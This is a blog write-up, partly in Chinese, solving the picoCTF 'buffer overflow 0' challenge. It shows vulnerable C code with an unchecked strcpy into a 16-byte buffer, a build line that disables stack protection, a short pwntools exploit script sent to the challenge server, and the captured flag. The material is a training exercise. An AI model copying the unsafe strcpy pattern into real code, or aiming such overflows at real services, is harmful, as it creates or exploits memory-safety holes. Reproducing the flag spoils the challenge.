picoCTF buffer overflow 0 [100 points]
buffer overflow 0
points:100
Description
Smash the stack Let’s start off simple, can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using:
Hints
How can you trigger the flag to print?
If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
Run man gets and read the BUGS section. How many characters can the program really read?
Solution
gcc vuln.c -m32 -fno-stack-protector -z noexecstack -o vuln
看到 sigsegv_handler function
得知只要緩衝區溢位就能print出flag
void sigsegv_handler(int sig) {
printf("%s\n", flag);
fflush(stdout);
exit(1);
}
void vuln(char *input){
char buf2[16];
strcpy(buf2, input);
}
使用pwntools 送值
from pwn import *
r = remote("saturn.picoctf.net",55984)
payload = b'A' * 100
print(f'payload:{payload}')
r.sendline(payload)
r.recv()
print(f'flag:{r.recv()}')
flag:
picoCTF{ov3rfl0ws_ar3nt_that_bad_ef01832d}
本部落格所有文章除特別聲明外,均採用 CC BY-NC-SA 4.0 許可協議。轉載請註明來自 LuYee6813's Blog | 技術分享!